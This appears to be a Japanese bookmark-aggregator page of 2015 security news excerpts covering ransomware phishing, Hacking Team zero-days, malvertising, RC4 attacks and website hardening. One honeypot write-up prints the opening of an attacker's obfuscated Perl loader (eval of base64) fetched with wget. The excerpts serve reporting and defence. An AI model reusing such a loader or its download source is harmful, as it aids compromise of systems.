「SI事例サイト」は「DX SI事例サイト」に移行しました。 旧URL https://www.si-jirei.jp/ ↓ 新URL https://dx.si-jirei.jp/ お気に入りやブックマークへ登録されている方は、お手数ですが設定の変更をお願いいたします。
Microsoftからの正規メールに見せかけた内容に騙されて添付ファイルをクリックするとランサムウェアに感染し、身代金を要求される。 米Microsoftが29日にリリースした「Windows 10」に便乗し、ユーザーのファイルを人質に取って身代金を要求するランサムウェアに感染させようとするメールが出回っているという。米Cisco Systemsが7月31日のブログで伝えた。 それによると、問題のメールは英語で「Windows 10 Free Update」という件名が付いている。送信元は偽造され、Microsoftから届いた正規メールのように見せかけてある。ただしヘッダを調べると、送信元のIPアドレスがタイにあることが分かるという。
BrowserLeaks is a suite of tools that offers a range of tests to evaluate the security and privacy of your web browser. These tests focus on identifying ways in which websites may leak your real IP address, collect information about your device, and perform a browser fingerprinting. By understanding these risks, you can take appropriate steps to protect your online privacy and minimize your exposu
総務省は、この度ウェブサービスを提供する企業におけるID・パスワードの管理・運用実態について調査した結果を取りまとめましたので公表します。 現在、インターネットショッピングやインターネットバンキング、ソーシャルネットワーキングサービス等、インターネットを通じて様々なサービスが提供されています。 総務省では、ウェブサービスにおいて利用者を確認する主な手段としてID・パスワードが利用されていることを踏まえ、ウェブサービスを提供する企業におけるID・パスワードの管理・運用実態について調査を行いました。 (1)約9割のサービスで3種類以上の文字種をパスワードとして利用できる パスワードとして利用可能な文字種(大文字・小文字・数字・記号)について、約9割が3種類以上利用可能であり、6割近くが4種類利用可能である等、大半のサービスで複数の文字種の組み合わせによるパスワードの設定が可能となっている。 (
ラック、標的型攻撃対策専門組織を設置し、「標的型攻撃 対策指南書」を無償公開 ~攻撃激化に対し、包括的な実践的対策で支援~ 2015年7月28日 | プレス 株式会社ラック(本社:東京都千代田区、代表取締役社長:髙梨 輝彦、以下ラック)は、成りすましメールなどによる標的型攻撃と被害が激増している現状に対し、当社最高技術責任者西本逸郎が陣頭指揮を執る標的型攻撃対策の専門組織「標的型攻撃対策本部」を設置します。また、標的型攻撃の具体的な対処方法について、経営者、事業責任者、IT技術者向けに、「標的型攻撃 対策指南書(第1版)」を無償で公開します。 昨今、当社の「サイバー救急センター」には、情報漏えいやウイルス感染などの被害対応の相談が増加しています。当社が事故対応した状況から、被害企業の業種には偏りが無く、攻撃者の狙いも個人情報の窃取から脅迫行為まで多岐にわたります。その手口の多くは、標的型攻
Hacking Team関係の情報をここにまとめます。 脆弱性情報のリーク 7月1日のHacking Teamのリークを受け、リークデータから確認された脆弱性は7月21日時点で6つ存在します。これらは全て発見当時未修正の脆弱性(ゼロデイ)でした。その内、3つはAdobe FlashPlayerの脆弱性であり、発見されてすぐに複数のExploit Kitをはじめとした悪用が始まりました。 対象 発見日 修正日 CVE 脆弱性の影響 Adobe FlashPlayer 7月7日 7月8日 CVE-2015-5119 リモートから任意のコード実行 Adobe FlashPlayer 7月11日 7月14日 CVE-2015-5122 リモートから任意のコード実行 Adobe FlashPlayer 7月12日 7月14日 CVE-2015-5123 リモートから任意のコード実行 Microsof
東京にあるスマートフォンのアクセサリーの販売会社のサーバーに、大量のデータを送りつける「DDoS攻撃」というサイバー攻撃を行い、業務を妨害したとして、ベトナム人の留学生が警視庁に逮捕されました。 「DDoS攻撃」をしたとして逮捕されるのは、全国で初めてだということです。 これまでの調べで、当時、この会社のサーバーには通常のおよそ30倍の負荷がかかり、1か月半にわたってホームページが閉鎖され、700万円程度の損害が出たとみられるということです。 警視庁によりますと、調べに対しグエン容疑者は「商品の売買を巡ってトラブルがあり、恨みがあってやった」などと供述し、容疑を認めているということです。 警視庁はいきさつを調べるとともに、「DDoS攻撃」に使えるソフトウエアなどがインターネット上などで出回っているとみて警戒を強めています。
米Hewlett-Packard(HP)のゼロデイ脆弱性研究プロジェクト「Zero Day Initiative」(ZDI)が、MicrosoftのInternet Explorer(IE)に存在する未解決の脆弱性4件に関する概要を公表した。 ZDIのWebサイトに7月20日付で掲載された情報によると、この4件の脆弱性ではいずれも、攻撃者が標的とする相手に不正なページを閲覧させたり不正なファイルを開かせたりするなどの手口を使って、リモートで任意のコードを実行できてしまう恐れがある。 危険度は共通脆弱性評価システム(CVSS)のスコアで6.8~7.5(最大値は10.0)と評価している。 4件の脆弱性のうち1件は、2014年11月にZDIが開催したモバイル版のハッキングコンペ「Pwn2Own」で研究者が実証し、Microsoftにも情報が提供されていた。残る3件も2015年1月にMicroso
東京都は21日、インターネットのサイト上に表示されたバナー広告を介し、職員のパソコン(PC)9台がウイルスに感染したと発表した。広告をクリックしなくても、表示されただけで感染するプログラムが仕掛けられていたという。 9台のうち4台には、都税の還付を受けた人の住所や口座番号など約2700人分の個人情報などが含まれていた。PCはいずれも外部への不正な通信を行っており、流出の恐れもあるが、現時点で被害は確認されていないという。 個人情報を職員PCに保存することは内規に違反している。日本年金機構の個人情報流出事件と同様に管理が甘く、都は約2700人に謝罪文を送付。再発防止に向け職員にルールの徹底を図る。 都によると、感染経路は朝日新聞や読売新聞のニュースサイトに表示されたバナー広告のほか、厚生労働省の外郭団体「安全衛生技術試験協会」のホームページ(HP)など。 ニュースサイト自体に問題はないが、広
HTTPS通信などに使われる暗号アルゴリズムの「RC4」を突破する新たな方法をセキュリティ研究者グループが発表した。 HTTPSなどの暗号化通信に使われている暗号アルゴリズム「RC4」の弱点を突いて、旧来の手法よりも短い時間で暗号化されたユーザーのcookieを解読できてしまう方法が見つかったという。ベルギー・ルーベン大学の2人のセキュリティ研究者Mathy Vanhoef氏とFrank Piessens氏が、「RC4 NOMORE」と題する論文を発表した。 RC4は、30年以上前に開発された古い暗号アルゴリズム。既にWindowsなどではサポートされていないものの、Webサイトの暗号化通信などではサポートが継続され、まだ3割程度の通信で使用されているという。 研究者らによると、この弱点を使った攻撃は、まず悪質なJavaScriptを埋め込んだWebサイトをユーザーに閲覧させ、暗号化された
ウェブサイトの脆弱性や運用管理の不備を悪用された情報漏えいやウェブページの改ざんなどの被害が多数発生しています。情報漏えいやウェブページの改ざんなどの被害が発生すると、ビジネスやサービスの中断、停止、またそれによって生じた損失への補償など、事業に直接的な影響が生じる恐れがあります。 安全にウェブサイトを運用管理するためには、下記図が示す対象ごとに適切な対策を実施することが必要です。どれが欠けても、ウェブサイトの安全性は確保できません。 ウェブサイト運営者、システムおよびネットワーク管理者は、下記の「ウェブサイトのセキュリティ対策のチェックポイント20ヶ条」を確認し、対策がとられていない項目があった場合には早急に対策をしてください。 ウェブサイトのセキュリティ対策のチェックポイント20ヶ条 ここに記載されている対策は、定期的に確認する必要があります。 1.ウェブアプリケーションのセキュリティ
不正アクセスを観測したのでご紹介。 動画を見ていただこう。 なにやら不正ファイルをwgetして実行しようとしてる。 Kippoは、侵入者がwgetしたファイルを、dl ディレクトリに全て格納してくれるので今回は実際に不審なファイルの中身を見てみよう。 中身を覗いてみる。encodeされていたので、見た目では、なにをするものなんかはわからない。 # more dl/20150709223030_http___erixx_altervista_org_new_txt #!/usr/bin/perl use MIME::Base64; eval (decode_base64('IyEvdXNyL2Jpbi9wZXJsDQoNCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy
未知の脅威に対抗するための「6原則」――ガートナー サミットから学ぶ、これからの情報セキュリティ対策:予防できない危機に対処するには 2015年7月13日、「ガートナー セキュリティ&リスク・マネジメントサミット 2015」が開催された。本稿ではガートナーの提案するセキュリティ対策の「6つの基本原則」を紹介し、これからの情報セキュリティ対策の在り方を考えてみる。 サイバー犯罪による被害規模が増大し、多くの企業にとって、情報セキュリティ対策の重要度がますます高まっている。米シンクタンクの戦略国際問題研究所(CSIS)によれば、2014年時点で、全世界でのサイバー犯罪による年間被害総額は数十兆円に達したともいう。しかし、セキュリティ対策のための多くの規制や規格が確立され、日々更新されているにもかかわらず、セキュリティ被害は後を絶たない。高度化・巧妙化する脅威に対して、企業はどのような対策を講じ
海外コメンタリー 「Windows Server 2003」、ついにサポート終了へ--必ず移行すべき理由 Microsoftの「Windows Server 2003」は、7月15日に公式サポートが終了する。実際面では、それはMicrosoftがそれ以降ソフトウェアをサポートせず、この日以降に生じるセキュリティ問題や互換性の問題には対応しないという意味だ。もしあなたの会社が15日以降もWindows Server 2003を使い続けるなら、極めて高額で不要なリスクを冒していることになる。 IT部門の調査 無料のITコミュニティーを手がけるSpiceworksが2015年3月に実施した、1300人以上のITプロフェッショナルを対象とした調査によれば、約63%がすでにWindows Server 2003からの移行を終えたか、部分的に移行を行っており、28%は計画段階にあったという。調査対象者
TL;DR やっぱり書いていたら長文になってしまいました。あまりちゃんと推敲する気力がないので、変な文章になっているかもしれません。ご了承いただける方のみお読みください。 1. はじめに 昨晩未明にOpenSSL-1.0.2d, 1.0.1pがリリースされました。事前に予告されていた通り深刻度高の脆弱性CVE-2015-1793が修正されています。Advisoryを見ると、この脆弱性がiojs/Nodeに影響があるということが判明したので直ちにiojs/Nodeのアップデートを行い、今朝未明に無事脆弱性対応版をリリースしました。 今回が初めてではありませんが、深夜に日欧米のエンジニアがgithub上で互いに連携しながら速やかにセキュリティ対策のリリース作業を行うことは何回やってもなかなかしびれる経験です。時差もありなかなか体力的には辛いものがありますが、世界の超一流のエンジニアと共同でリア
.app 1 .dev 1 #11WeeksOfAndroid 13 #11WeeksOfAndroid Android TV 1 #Android11 3 #DevFest16 1 #DevFest17 1 #DevFest18 1 #DevFest19 1 #DevFest20 1 #DevFest21 1 #DevFest22 1 #DevFest23 1 #hack4jp 3 11 weeks of Android 2 A MESSAGE FROM OUR CEO 1 A/B Testing 1 A4A 4 Accelerator 6 Accessibility 1 accuracy 1 Actions on Google 16 Activation Atlas 1 address validation API 1 Addy Osmani 1 ADK 2 AdMob 32 Ads
リリース、障害情報などのサービスのお知らせ
最新の人気エントリーの配信
処理を実行中です
j次のブックマーク
k前のブックマーク
lあとで読む
eコメント一覧を開く
oページを開く